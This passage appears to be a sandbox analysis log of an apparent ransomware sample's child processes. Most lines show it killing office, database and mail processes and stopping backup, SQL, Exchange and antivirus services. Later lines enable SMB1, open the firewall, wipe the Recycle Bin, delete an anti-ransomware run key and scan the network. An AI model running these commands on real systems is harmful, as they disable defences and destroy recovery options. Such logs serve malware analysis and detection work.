C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9000

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8980

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8972

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8964

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8948

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8940

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
4⤵
- Kills process with taskkill
PID:8924

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8912

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8884

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8452

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8440

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8432

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8424

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8416

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8408

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8400

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8384

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8376

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8348

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8332

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8312

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8264

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8224

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8212

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8204

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8196

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
4⤵
PID:7520

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
4⤵
PID:2136

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
4⤵
PID:2456

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
4⤵
PID:7176

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
4⤵
PID:7116

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
4⤵
PID:6684

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
4⤵
PID:6456

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
4⤵
PID:6208

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
4⤵
PID:5176

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
4⤵
PID:6044

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
4⤵
PID:5908

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
4⤵
PID:5808

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
4⤵
PID:7456

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
4⤵
PID:7196

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
4⤵
PID:7072

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
4⤵
PID:7064

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
4⤵
PID:7056

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
4⤵
PID:7040

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
4⤵
PID:7032

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
4⤵
PID:7024

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
4⤵
PID:7016

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
4⤵
PID:7000

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:6992

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
4⤵
PID:6984

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
4⤵
PID:6976

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
4⤵
PID:6968

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
4⤵
PID:6944

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
4⤵
PID:6936

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
4⤵
PID:6928

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
4⤵
PID:6920

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
4⤵
PID:6912

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
4⤵
PID:6904

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
4⤵
PID:6896

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
4⤵
PID:6888

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
4⤵
PID:6872

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
4⤵
PID:6864

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
4⤵
PID:6856

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
4⤵
PID:6848

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
4⤵
PID:6832

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
4⤵
PID:6824

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
4⤵
PID:6816

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
4⤵
PID:6800

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
4⤵
PID:6792

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
4⤵
PID:6784

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
4⤵
PID:6776

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
4⤵
PID:6752

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
4⤵
PID:6744

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
4⤵
PID:6736

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
4⤵
PID:6728

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
4⤵
PID:6712

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
4⤵
PID:6704

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
4⤵
PID:6696

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
4⤵
PID:6688

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
4⤵
PID:6672

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:6664

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
4⤵
PID:6656

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
4⤵
PID:6648

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
4⤵
PID:6632

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
4⤵
PID:6624

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
4⤵
PID:6616

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
4⤵
PID:6604

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
4⤵
PID:6588

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
4⤵
PID:6580

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
4⤵
PID:6572

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
4⤵
PID:6556

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
4⤵
PID:6548

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
4⤵
PID:6540

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
4⤵
PID:6532

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
4⤵
PID:6516

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
4⤵
PID:6508

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:6500

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
4⤵
PID:6492

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
4⤵
PID:6476

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
4⤵
PID:6468

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
4⤵
PID:6460

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
4⤵
PID:6444

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
4⤵
PID:6436

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
4⤵
PID:6428

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
4⤵
PID:6420

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
4⤵
PID:6404

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:6396

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
4⤵
PID:6388

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:6380

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
4⤵
PID:6360

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
4⤵
PID:6352

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
4⤵
PID:6344

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
4⤵
PID:6336

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
4⤵
PID:6328

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:6320

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
4⤵
PID:6312

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
4⤵
PID:6304

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
4⤵
PID:6292

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
4⤵
PID:6276

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
4⤵
PID:6268

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
4⤵
PID:6252

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
4⤵
PID:6244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
4⤵
PID:6236

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
4⤵
PID:6228

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:6220

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
4⤵
PID:6212

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
4⤵
PID:6196

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
4⤵
PID:6188

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:6172

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
4⤵
PID:6164

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
4⤵
PID:6156

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
4⤵
PID:6148

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
4⤵
PID:5256

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
4⤵
PID:5208

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
4⤵
PID:3524

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
4⤵
PID:3612

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:6140

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
4⤵
PID:6132

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
4⤵
PID:6124

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
4⤵
PID:6112

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
4⤵
PID:6104

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
4⤵
PID:6088

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
4⤵
PID:6080

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
4⤵
PID:6072

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
4⤵
PID:6064

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
4⤵
PID:6056

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
4⤵
PID:6048

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
4⤵
PID:6032

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
4⤵
PID:6024

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
4⤵
PID:6016

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
4⤵
PID:6008

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
4⤵
PID:5992

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
4⤵
PID:5984

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
4⤵
PID:5976

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:5968

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
4⤵
PID:5960

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
4⤵
PID:5944

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
4⤵
PID:5936

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
4⤵
PID:5928

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
4⤵
PID:5920

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
4⤵
PID:5912

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
4⤵
PID:5896

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
4⤵
PID:5888

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
4⤵
PID:5880

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
4⤵
PID:5872

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
4⤵
PID:5864

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
4⤵
PID:5856

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:5840

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
4⤵
PID:5832

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
4⤵
PID:5824

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
4⤵
PID:5816

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
4⤵
PID:5796

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
4⤵
PID:5788

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:5772

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
4⤵
PID:5764

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
4⤵
PID:5748

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:5740

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
4⤵
PID:5732

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
4⤵
PID:5724

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:5716

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
4⤵
PID:5704

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
4⤵
PID:5688

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:5680

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
4⤵
PID:5672

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
4⤵
PID:5664

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:5656

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:5644

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
4⤵
PID:5636

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:5628

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
4⤵
PID:5620

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
4⤵
PID:5612

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:5604

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
4⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
4⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
4⤵
PID:5580

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
4⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
4⤵
PID:5564

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
4⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
4⤵
PID:5540

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
4⤵
PID:5532

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
4⤵
PID:5524

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
4⤵
PID:5516

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
4⤵
PID:5508

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
4⤵
PID:5500

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
4⤵
PID:5492

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
4⤵
PID:5480

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
4⤵
PID:5472

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
4⤵
PID:5464

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
4⤵
PID:5456

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
4⤵
PID:5444

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
4⤵
PID:5436

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
4⤵
PID:5428

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
4⤵
PID:5420

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
4⤵
PID:5412

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
4⤵
PID:5400

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
4⤵
PID:5392

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
4⤵
PID:5384

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
4⤵
PID:5376

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
4⤵
PID:5368

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
4⤵
PID:5360

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
4⤵
PID:5348

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
4⤵
PID:5340

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
4⤵
PID:5328

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
4⤵
PID:5320

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
4⤵
PID:5308

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
4⤵
PID:5300

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
4⤵
PID:5292

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
4⤵
PID:5280

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
4⤵
PID:5272

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
4⤵
PID:5152

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
4⤵
PID:2484

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
4⤵
PID:1772

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
4⤵
PID:1008

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
4⤵
PID:2904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
4⤵
PID:2052

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
4⤵
PID:1164

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
4⤵
PID:584

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
4⤵
PID:4864

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
4⤵
PID:5088

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
4⤵
PID:2108

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
4⤵
PID:1496

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
4⤵
PID:2696

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
4⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
4⤵
PID:220

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
4⤵
PID:4652

C:\Windows\SysWOW64\arp.exe
"arp" -a
4⤵
PID:15872

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.77
4⤵
PID:14480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:3984

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:5124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:5168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:10968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:12276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:12540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:12780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:12876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:13100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:10012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:13344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:14192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:14572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:14952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:15296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:15536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:15880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:15972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:15956

C:\Windows\SysWOW64\net1.exe
